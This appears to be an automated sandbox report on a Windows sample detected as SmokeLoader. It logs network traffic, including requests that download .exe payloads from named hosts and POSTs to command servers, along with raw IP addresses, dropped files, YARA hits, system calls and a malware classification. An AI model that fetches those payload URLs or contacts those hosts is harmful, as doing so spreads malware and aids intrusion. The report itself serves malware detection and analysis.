Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 4b ef ae 8a 70 bc 57 dd 42 d6 f7 23 8c 21 e6 c3 93 50 2c e2 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9KpWB#!P,c0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:57 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeData Raw: 31 31 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 64 61 74 61 2d 68 6f 73 74 2d 63 6f 69 6e 2d 38 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 11a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at data-host-coin-8.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:55:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a Data Ascii: 37I:82OR%@_M-\z.TKC0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:56:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 02 e9 1a d1 70 ae 59 4a d9 52 a6 be 67 e3 25 58 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e5 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOjpYJRg%XQAc}yc0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:56:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:56:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:56:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OO~kEKg2P0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 28 Dec 2021 12:55:13 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:56:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c8 89 40 0e 65 1b e4 bf c1 b1 a2 14 a5 08 cd 2c b4 59 52 db 17 f8 ee 39 ec 3f 52 17 b2 ea 93 42 fe 02 86 1c 80 a7 70 9b 77 a7 f9 0d 0a 30 0d 0a 0d 0a Data Ascii: 3eI:82O@e,YR9?RBpw0

Source: unknown	TCP traffic detected without corresponding DNS query: 185.186.142.166
Source: unknown	TCP traffic detected without corresponding DNS query: 185.186.142.166
Source: unknown	TCP traffic detected without corresponding DNS query: 185.186.142.166
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dbbxvwuoso.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: host-data-coin-11.com

Source: unknown

DNS traffic detected: queries for: host-data-coin-11.com

Source: global traffic	HTTP traffic detected: GET /files/5376_1640094939_1074.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
Source: global traffic	HTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytools-foryou-777.com
Source: global traffic	HTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 00000001.00000002.733146103.0000000000540000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.781213827.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.733351124.0000000002051000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.720297741.0000000004F41000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.781100610.0000000000460000.00000004.00000001.sdmp, type: MEMORY

Source: UZ6FEqlix4.exe, 00000000.00000002.674898642.000000000083A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: UZ6FEqlix4.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: 1_2_00402A5F	1_2_00402A5F
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: 1_2_00402AB3	1_2_00402AB3
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: 1_1_00402A5F	1_1_00402A5F
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: 1_1_00402B2E	1_1_00402B2E
Source: C:\Users\user\AppData\Roaming\eveggtb	Code function: 11_2_00402A5F	11_2_00402A5F
Source: C:\Users\user\AppData\Roaming\eveggtb	Code function: 11_2_00402AB3	11_2_00402AB3
Source: C:\Users\user\AppData\Roaming\eveggtb	Code function: 11_1_00402A5F	11_1_00402A5F
Source: C:\Users\user\AppData\Roaming\eveggtb	Code function: 11_1_00402AB3	11_1_00402AB3

Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: String function: 00426940 appears 133 times
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: String function: 00428320 appears 93 times

Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: 1_2_00401962 Sleep,NtTerminateProcess,	1_2_00401962
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: 1_2_0040196D Sleep,NtTerminateProcess,	1_2_0040196D
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: 1_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	1_2_00402000
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: 1_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,	1_2_0040250A
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: 1_2_00401A0B NtTerminateProcess,	1_2_00401A0B
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: 1_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	1_2_0040201A
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: 1_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	1_2_0040201E
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: 1_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	1_2_0040202D
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: 1_2_00402084 LocalAlloc,NtQuerySystemInformation,	1_2_00402084
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: 1_2_00402491 NtOpenKey,	1_2_00402491
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: 1_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	1_1_00402000
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: 1_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,	1_1_0040250A
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: 1_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	1_1_0040201A
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: 1_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	1_1_0040201E
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: 1_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	1_1_0040202D
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: 1_1_00402084 LocalAlloc,NtQuerySystemInformation,	1_1_00402084
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: 1_1_00402491 NtOpenKey,	1_1_00402491
Source: C:\Users\user\AppData\Roaming\eveggtb	Code function: 11_2_00401962 Sleep,NtTerminateProcess,	11_2_00401962
Source: C:\Users\user\AppData\Roaming\eveggtb	Code function: 11_2_0040196D Sleep,NtTerminateProcess,	11_2_0040196D
Source: C:\Users\user\AppData\Roaming\eveggtb	Code function: 11_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	11_2_00402000
Source: C:\Users\user\AppData\Roaming\eveggtb	Code function: 11_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,	11_2_0040250A
Source: C:\Users\user\AppData\Roaming\eveggtb	Code function: 11_2_00401A0B NtTerminateProcess,	11_2_00401A0B
Source: C:\Users\user\AppData\Roaming\eveggtb	Code function: 11_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	11_2_0040201A
Source: C:\Users\user\AppData\Roaming\eveggtb	Code function: 11_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	11_2_0040201E
Source: C:\Users\user\AppData\Roaming\eveggtb	Code function: 11_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	11_2_0040202D
Source: C:\Users\user\AppData\Roaming\eveggtb	Code function: 11_2_00402084 LocalAlloc,NtQuerySystemInformation,	11_2_00402084
Source: C:\Users\user\AppData\Roaming\eveggtb	Code function: 11_2_00402491 NtOpenKey,	11_2_00402491
Source: C:\Users\user\AppData\Roaming\eveggtb	Code function: 11_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	11_1_00402000
Source: C:\Users\user\AppData\Roaming\eveggtb	Code function: 11_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,	11_1_0040250A
Source: C:\Users\user\AppData\Roaming\eveggtb	Code function: 11_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	11_1_0040201A
Source: C:\Users\user\AppData\Roaming\eveggtb	Code function: 11_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	11_1_0040201E
Source: C:\Users\user\AppData\Roaming\eveggtb	Code function: 11_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	11_1_0040202D
Source: C:\Users\user\AppData\Roaming\eveggtb	Code function: 11_1_00402084 LocalAlloc,NtQuerySystemInformation,	11_1_00402084
Source: C:\Users\user\AppData\Roaming\eveggtb	Code function: 11_1_00402491 NtOpenKey,	11_1_00402491

Source: UZ6FEqlix4.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UZ6FEqlix4.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 411F.exe.5.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 411F.exe.5.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: eveggtb.5.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: eveggtb.5.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\411F.exe 8BBDDA1786E15A568A573A2F38762E95DE138AF969E0A13B96D7086AAA98BFC2
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\eveggtb 8BBDDA1786E15A568A573A2F38762E95DE138AF969E0A13B96D7086AAA98BFC2

Source: UZ6FEqlix4.exe	Virustotal: Detection: 58%
Source: UZ6FEqlix4.exe	Metadefender: Detection: 20%
Source: UZ6FEqlix4.exe	ReversingLabs: Detection: 62%

Source: UZ6FEqlix4.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\UZ6FEqlix4.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\UZ6FEqlix4.exe "C:\Users\user\Desktop\UZ6FEqlix4.exe"
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Process created: C:\Users\user\Desktop\UZ6FEqlix4.exe "C:\Users\user\Desktop\UZ6FEqlix4.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\eveggtb C:\Users\user\AppData\Roaming\eveggtb
Source: C:\Users\user\AppData\Roaming\eveggtb	Process created: C:\Users\user\AppData\Roaming\eveggtb C:\Users\user\AppData\Roaming\eveggtb
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\411F.exe C:\Users\user\AppData\Local\Temp\411F.exe
Source: C:\Users\user\AppData\Local\Temp\411F.exe	Process created: C:\Users\user\AppData\Local\Temp\411F.exe C:\Users\user\AppData\Local\Temp\411F.exe
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Process created: C:\Users\user\Desktop\UZ6FEqlix4.exe "C:\Users\user\Desktop\UZ6FEqlix4.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eveggtb	Process created: C:\Users\user\AppData\Roaming\eveggtb C:\Users\user\AppData\Roaming\eveggtb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\411F.exe	Process created: C:\Users\user\AppData\Local\Temp\411F.exe C:\Users\user\AppData\Local\Temp\411F.exe	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32

Jump to behavior

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\eveggtb

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@9/3@24/5

Source: C:\Users\user\Desktop\UZ6FEqlix4.exe

Code function: 0_2_0041C7DF GetTickCount,FreeUserPhysicalPages,GetCalendarInfoW,GetProfileStringA,SetLastError,GetSystemWow64DirectoryA,GetWindowsDirectoryW,GetCPInfoExW,GetDiskFreeSpaceExW,GetStartupInfoA,ReadConsoleOutputCharacterA,CreateNamedPipeW,GetProcessHeap,GetProcessHeap,GetPrivateProfileIntW,SetFileAttributesA,

0_2_0041C7DF

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: UZ6FEqlix4.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: UZ6FEqlix4.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: UZ6FEqlix4.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: UZ6FEqlix4.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: UZ6FEqlix4.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: UZ6FEqlix4.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: UZ6FEqlix4.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: "C:\sigut-wo.pdb source: UZ6FEqlix4.exe, eveggtb.5.dr, 411F.exe.5.dr
Source:	Binary string: C:\sigut-wo.pdb source: UZ6FEqlix4.exe, eveggtb.5.dr, 411F.exe.5.dr

Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: 0_2_004235C8 push eax; ret	0_2_004235E6
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: 0_2_008497BF push esi; ret	0_2_008497D5
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: 0_2_0084975A push esi; ret	0_2_008497D5
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: 1_2_00401880 push esi; iretd	1_2_00401893
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: 1_2_00402E94 push es; iretd	1_2_00402EA0
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: 1_1_00402E94 push es; iretd	1_1_00402EA0
